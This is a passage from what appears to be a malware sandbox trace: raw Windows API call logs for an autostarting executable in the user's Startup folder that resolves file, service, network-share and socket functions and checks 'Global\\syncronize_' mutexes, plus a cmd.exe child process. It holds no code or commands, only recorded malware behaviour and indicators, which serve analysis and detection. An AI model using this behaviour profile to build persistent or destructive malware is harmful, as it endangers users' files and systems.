ftLastAccessTime.dwLowDateTime=0x369ad2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x369ad2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0x0, dwReserved1=0x0, cFileName="variant.js", cAlternateFileName="")) returned 1 [0177.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0177.794] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee66f38b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xb58bb396, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x369ad2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Resource0", cAlternateFileName="RESOUR~1")) returned 0 [0177.794] FindClose (in: hFindFile=0x727c48 | out: hFindFile=0x727c48) returned 1 [0177.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0177.794] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72bf0d00, ftCreationTime.dwHighDateTime=0x1d28909, ftLastAccessTime.dwLowDateTime=0x191f2bd5, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0x72bf0d00, ftLastWriteTime.dwHighDateTime=0x1d28909, nFileSizeHigh=0x0, nFileSizeLow=0x12eb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Welcome.pdf", cAlternateFileName="")) returned 1 [0177.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0177.796] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb506b200, ftCreationTime.dwHighDateTime=0x1d06041, ftLastAccessTime.dwLowDateTime=0x3632d245, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb506b200, ftLastWriteTime.dwHighDateTime=0x1d06041, nFileSizeHigh=0x0, nFileSizeLow=0x40f9, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ReadMe.htm", cAlternateFileName="")) returned 1 [0177.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0177.796] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc76079d0, ftCreationTime.dwHighDateTime=0x1d4e21b, ftLastAccessTime.dwLowDateTime=0x6587bc00, ftLastAccessTime.dwHighDateTime=0x1d490bd, ftLastWriteTime.dwLowDateTime=0x6587bc00, ftLastWriteTime.dwHighDateTime=0x1d490bd, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="arbor-tutorials-lawyers.exe", cAlternateFileName="ARBOR-~1.EXE")) returned 1 [0177.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0177.796] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe5357cd7, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe5357cd7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0177.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0177.796] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0177.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44c0048 | out: hHeap=0x6a0000) returned 1 Thread: id = 55 os_tid = 0xeb4 Thread: id = 56 os_tid = 0xebc Thread: id = 58 os_tid = 0xec4 Thread: id = 59 os_tid = 0xecc Thread: id = 60 os_tid = 0xed0 Thread: id = 61 os_tid = 0xed4 Process: id = "6" image_name = "hgaibc.exe" filename = "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe" page_root = "0x52a95000" os_pid = "0xe34" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe\" " cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0xe38 [0153.117] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77050000 [0153.117] GetProcAddress (hModule=0x77050000, lpProcName="GetProcAddress") returned 0x770651b0 [0153.117] GetProcAddress (hModule=0x77050000, lpProcName="GetModuleHandleW") returned 0x770650d0 [0153.117] GetProcAddress (hModule=0x77050000, lpProcName="FindNextFileW") returned 0x770bee40 [0153.117] GetProcAddress (hModule=0x77050000, lpProcName="FindClose") returned 0x770bed70 [0153.117] GetProcAddress (hModule=0x77050000, lpProcName="MoveFileW") returned 0x7709e500 [0153.117] GetProcAddress (hModule=0x77050000, lpProcName="GetFileSizeEx") returned 0x770bef40 [0153.117] GetProcAddress (hModule=0x77050000, lpProcName="GetModuleFileNameW") returned 0x77065090 [0153.117] GetProcAddress (hModule=0x77050000, lpProcName="GetFileAttributesW") returned 0x770bef10 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="ExitProcess") returned 0x77063cb0 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="GetCommandLineW") returned 0x77064cc0 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="GetComputerNameW") returned 0x770932c0 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="GetComputerNameA") returned 0x77093780 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="CreateMutexW") returned 0x770beb70 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="lstrlenW") returned 0x77066c70 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="lstrlenA") returned 0x77066c50 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="GetCurrentProcess") returned 0x770bea10 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="WaitForSingleObject") returned 0x770beca0 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="GetLogicalDrives") returned 0x77060d20 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="GetTickCount") returned 0x770bdd50 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="DeleteFileW") returned 0x770bed40 [0153.118] GetProcAddress (hModule=0x77050000, lpProcName="WideCharToMultiByte") returned 0x77066b10 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x770bebb0 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="Sleep") returned 0x77066760 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="LeaveCriticalSection") returned 0x7789b250 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="ReadFile") returned 0x770bf090 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="CreateFileW") returned 0x770bed10 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="OpenMutexW") returned 0x770bebf0 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="EnterCriticalSection") returned 0x7789b2d0 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="WaitForMultipleObjects") returned 0x770bec80 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="lstrcmpiW") returned 0x77066bf0 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="lstrcmpiA") returned 0x77066bd0 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="DeleteCriticalSection") returned 0x7787fb90 [0153.119] GetProcAddress (hModule=0x77050000, lpProcName="ReleaseMutex") returned 0x770bec20 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="CloseHandle") returned 0x770beab0 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="GetVersion") returned 0x770656c0 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="CreateThread") returned 0x770646b0 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="ExpandEnvironmentStringsW") returned 0x77064a40 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="QueryPerformanceCounter") returned 0x77065da0 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="QueryPerformanceFrequency") returned 0x77065dc0 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="GetCurrentProcessId") returned 0x770bea20 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="SetFileAttributesW") returned 0x770bf100 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="GetVolumeInformationW") returned 0x770bf020 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="WriteFile") returned 0x770bf180 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="SetFilePointerEx") returned 0x770bf130 [0153.120] GetProcAddress (hModule=0x77050000, lpProcName="SetEndOfFile") returned 0x770bf0e0 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="FindFirstFileW") returned 0x770bedf0 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="GetProcessHeap") returned 0x770651f0 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="HeapReAlloc") returned 0x7788f630 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="HeapAlloc") returned 0x77892dc0 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="HeapFree") returned 0x770657f0 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="CreatePipe") returned 0x77064590 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="SetHandleInformation") returned 0x770beae0 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="CreateProcessW") returned 0x77064610 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="CompareStringW") returned 0x77064430 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="CompareStringA") returned 0x77064410 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="OpenProcess") returned 0x77065cc0 [0153.121] GetProcAddress (hModule=0x77050000, lpProcName="TerminateProcess") returned 0x770667e0 [0153.122] GetProcAddress (hModule=0x77050000, lpProcName="GetSystemTime") returned 0x770654e0 [0153.122] GetProcAddress (hModule=0x77050000, lpProcName="SystemTimeToFileTime") returned 0x770667a0 [0153.122] GetProcAddress (hModule=0x77050000, lpProcName="GetLastError") returned 0x77065010 [0153.122] GetProcAddress (hModule=0x77050000, lpProcName="CreateToolhelp32Snapshot") returned 0x7709edc0 [0153.122] GetProcAddress (hModule=0x77050000, lpProcName="Process32NextW") returned 0x7709f8f0 [0153.122] GetProcAddress (hModule=0x77050000, lpProcName="Process32FirstW") returned 0x7709f750 [0153.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x75b90000 [0153.162] GetProcAddress (hModule=0x75b90000, lpProcName="RegOpenKeyExW") returned 0x75bae580 [0153.162] GetProcAddress (hModule=0x75b90000, lpProcName="RegQueryValueExW") returned 0x75bae5a0 [0153.162] GetProcAddress (hModule=0x75b90000, lpProcName="RegSetValueExW") returned 0x75baf530 [0153.162] GetProcAddress (hModule=0x75b90000, lpProcName="RegCloseKey") returned 0x75baed60 [0153.162] GetProcAddress (hModule=0x75b90000, lpProcName="OpenProcessToken") returned 0x75baefb0 [0153.162] GetProcAddress (hModule=0x75b90000, lpProcName="GetTokenInformation") returned 0x75baee90 [0153.162] GetProcAddress (hModule=0x75b90000, lpProcName="OpenSCManagerW") returned 0x75bb0540 [0153.162] GetProcAddress (hModule=0x75b90000, lpProcName="OpenServiceW") returned 0x75bafa20 [0153.163] GetProcAddress (hModule=0x75b90000, lpProcName="CloseServiceHandle") returned 0x75bafc00 [0153.163] GetProcAddress (hModule=0x75b90000, lpProcName="ControlService") returned 0x75bc26d0 [0153.163] GetProcAddress (hModule=0x75b90000, lpProcName="QueryServiceStatus") returned 0x75bb2380 [0153.163] GetProcAddress (hModule=0x75b90000, lpProcName="EnumDependentServicesW") returned 0x75bc2f70 [0153.163] GetProcAddress (hModule=0x75b90000, lpProcName="EnumServicesStatusExW") returned 0x75bafc80 [0153.163] LoadLibraryA (lpLibFileName="user32.dll") returned 0x774c0000 [0153.232] GetProcAddress (hModule=0x774c0000, lpProcName="SystemParametersInfoW") returned 0x774ef210 [0153.232] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x744f0000 [0153.716] GetProcAddress (hModule=0x744f0000, lpProcName="ShellExecuteExW") returned 0x74654730 [0153.716] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77850000 [0153.716] GetProcAddress (hModule=0x77850000, lpProcName="NtQuerySystemInformation") returned 0x778c2070 [0153.716] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74250000 [0153.719] GetProcAddress (hModule=0x74250000, lpProcName="WNetCloseEnum") returned 0x74252640 [0153.719] GetProcAddress (hModule=0x74250000, lpProcName="WNetOpenEnumW") returned 0x74252790 [0153.719] GetProcAddress (hModule=0x74250000, lpProcName="WNetEnumResourceW") returned 0x74252410 [0153.719] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76f10000 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="WSAStartup") returned 0x76f15b40 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="socket") returned 0x76f24510 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="send") returned 0x76f15030 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="recv") returned 0x76f20c50 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="connect") returned 0x76f15410 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="closesocket") returned 0x76f20910 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="gethostbyname") returned 0x76f46cb0 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="inet_addr") returned 0x76f29160 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="ntohl") returned 0x76f149d0 [0153.724] GetProcAddress (hModule=0x76f10000, lpProcName="htonl") returned 0x76f149d0 [0153.725] GetProcAddress (hModule=0x76f10000, lpProcName="htons") returned 0x76f28ff0 [0153.725] GetProcessHeap () returned 0x440000 [0153.725] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44aff8 [0153.725] QueryPerformanceCounter (in: lpPerformanceCount=0x19fdb0 | out: lpPerformanceCount=0x19fdb0*=7423771604) returned 1 [0153.725] GetTickCount () returned 0x121db [0153.725] GetCurrentProcessId () returned 0xe34 [0153.727] GetTickCount () returned 0x121db [0153.727] GetTickCount () returned 0x121db [0153.727] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44b020 [0153.727] GetVersion () returned 0x23f00206 [0153.727] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x7) returned 0x456ea8 [0153.727] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x458028 [0153.727] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x458028, Size=0x20) returned 0x44b048 [0153.727] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x44b048, Size=0x40) returned 0x457520 [0153.727] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xfffe) returned 0x45d6c8 [0153.728] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_1TPBM0A") returned 0x1ec [0153.728] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456ea8 | out: hHeap=0x440000) returned 1 [0153.728] lstrlenW (lpString="Global\\syncronize_") returned 18 [0153.728] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x457520 | out: hHeap=0x440000) returned 1 [0153.728] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x7) returned 0x456ea8 [0153.728] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x457ea8 [0153.728] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x457ea8, Size=0x20) returned 0x44b048 [0153.728] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x44b048, Size=0x40) returned 0x457520 [0153.728] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xfffe) returned 0x46d6d0 [0153.728] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_1TPBM0U") returned 0x1f0 [0153.728] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456ea8 | out: hHeap=0x440000) returned 1 [0153.728] lstrlenW (lpString="Global\\syncronize_") returned 18 [0153.728] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x457520 | out: hHeap=0x440000) returned 1 [0153.728] GetVersion () returned 0x23f00206 [0153.728] GetCurrentProcess () returned 0xffffffff [0153.728] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fd9c | out: TokenHandle=0x19fd9c*=0x1f4) returned 1 [0153.728] GetTokenInformation (in: TokenHandle=0x1f4, TokenInformationClass=0x14, TokenInformation=0x19fd98, TokenInformationLength=0x4, ReturnLength=0x19fda4 | out: TokenInformation=0x19fd98, ReturnLength=0x19fda4) returned 1 [0153.729] CloseHandle (hObject=0x1f4) returned 1 [0153.729] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x102 [0153.729] ExitProcess (uExitCode=0x0) Thread: id = 32 os_tid = 0xe3c Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2fd03000" os_pid = "0xe40" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xe24" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0xe44 [0157.964] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff695310000 [0157.964] __set_app_type (_Type=0x1) [0157.964] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff695326d00) returned 0x0 [0157.964] __getmainargs (in: _Argc=0x7ff695349200, _Argv=0x7ff695349208, _Env=0x7ff695349210, _DoWildCard=0, _StartInfo=0x7ff69534921c | out: _Argc=0x7ff695349200, _Argv=0x7ff695349208, _Env=0x7ff695349210) returned 0 [0157.965] _onexit (_Func=0x7ff695327fd0) returned 0x7ff695327fd0 [0157.965] _onexit (_Func=0x7ff695327fe0) returned 0x7ff695327fe0 [0157.965] _onexit (_Func=0x7ff695327ff0) returned 0x7ff695327ff0 [0157.965] _onexit (_Func=0x7ff695328000) returned 0x7ff695328000 [0157.966] _onexit (_Func=0x7ff695328010) returned 0x7ff695328010 [0157.967] _onexit (_Func=0x7ff695328020) returned 0x7ff695328020 [0157.967] GetCurrentThreadId () returned 0xe44 [0157.967] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe44) returned 0x70 [0157.968] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff8c81c0000 [0157.968] GetProcAddress (hModule=0x7ff8c81c0000, lpProcName="SetThreadUILanguage") returned 0x7ff8c81da990 [0157.968] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.399] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.399] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4253cff7c8 | out: phkResult=0x4253cff7c8*=0x0) returned 0x2 [0158.399] VirtualQuery (in: lpAddress=0x4253cff7b4, lpBuffer=0x4253cff730, dwLength=0x30 | out: lpBuffer=0x4253cff730*(BaseAddress=0x4253cff000, AllocationBase=0x4253c00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0158.399] VirtualQuery (in: lpAddress=0x4253c00000, lpBuffer=0x4253cff730, dwLength=0x30 | out: lpBuffer=0x4253cff730*(BaseAddress=0x4253c00000, AllocationBase=0x4253c00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0158.399] VirtualQuery (in: lpAddress=0x4253c01000, lpBuffer=0x4253cff730, dwLength=0x30 | out: lpBuffer=0x4253cff730*(BaseAddress=0x4253c01000, AllocationBase=0x4253c00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0158.399] VirtualQuery (in: lpAddress=0x4253c04000, lpBuffer=0x4253cff730, dwLength=0x30 | out: lpBuffer=0x4253cff730*(BaseAddress=0x4253c04000, AllocationBase=0x4253c00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0158.399] VirtualQuery (in: lpAddress=0x4253d00000, lpBuffer=0x4253cff730, dwLength=0x30 | out: lpBuffer=0x4253cff730*(BaseAddress=0x4253d00000, AllocationBase=0x4253d00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0158.399] GetConsoleOutputCP () returned 0x1b5 [0158.795] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0158.796] SetConsoleCtrlHandler (HandlerRoutine=0x7ff695338150, Add=1) returned 1 [0158.796] _get_osfhandle (_FileHandle=1) returned 0x254 [0158.796] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff69534fc04 | out: lpMode=0x7ff69534fc04) returned 0 [0158.796] _get_osfhandle (_FileHandle=0) returned 0x248 [0158.797] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff69534fc00 | out: lpMode=0x7ff69534fc00) returned 0 [0158.797] _get_osfhandle (_FileHandle=1) returned 0x254 [0158.797] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0158.797] _get_osfhandle (_FileHandle=1) returned 0x254 [0158.797] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff69534fc08 | out: lpMode=0x7ff69534fc08) returned 0 [0158.797] _get_osfhandle (_FileHandle=0) returned 0x248 [0158.797] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff69534fc0c | out: lpMode=0x7ff69534fc0c) returned 0 [0158.797] GetEnvironmentStringsW () returned 0x1916fa15a40* [0158.798] GetProcessHeap () returned 0x1916fa10000 [0158.798] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xab6) returned 0x1916fa16500 [0158.798] FreeEnvironmentStringsA (penv="=") returned 1 [0158.798] GetProcessHeap () returned 0x1916fa10000 [0158.798] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x8) returned 0x1916fa15a40 [0158.798] GetEnvironmentStringsW () returned 0x1916fa16fd0* [0158.798] GetProcessHeap () returned 0x1916fa10000 [0158.798] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xab6) returned 0x1916fa17a90 [0158.799] FreeEnvironmentStringsA (penv="=") returned 1 [0158.799] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4253cfe678 | out: phkResult=0x4253cfe678*=0x7c) returned 0x0 [0158.800] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x0, lpData=0x4253cfe690*=0x4, lpcbData=0x4253cfe674*=0x1000) returned 0x2 [0158.800] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x4, lpData=0x4253cfe690*=0x1, lpcbData=0x4253cfe674*=0x4) returned 0x0 [0158.800] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x0, lpData=0x4253cfe690*=0x1, lpcbData=0x4253cfe674*=0x1000) returned 0x2 [0158.800] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x4, lpData=0x4253cfe690*=0x0, lpcbData=0x4253cfe674*=0x4) returned 0x0 [0158.800] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x4, lpData=0x4253cfe690*=0x40, lpcbData=0x4253cfe674*=0x4) returned 0x0 [0158.800] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x4, lpData=0x4253cfe690*=0x40, lpcbData=0x4253cfe674*=0x4) returned 0x0 [0158.800] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x0, lpData=0x4253cfe690*=0x40, lpcbData=0x4253cfe674*=0x1000) returned 0x2 [0158.800] RegCloseKey (hKey=0x7c) returned 0x0 [0158.800] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4253cfe678 | out: phkResult=0x4253cfe678*=0x7c) returned 0x0 [0158.800] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x0, lpData=0x4253cfe690*=0x40, lpcbData=0x4253cfe674*=0x1000) returned 0x2 [0158.801] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x4, lpData=0x4253cfe690*=0x1, 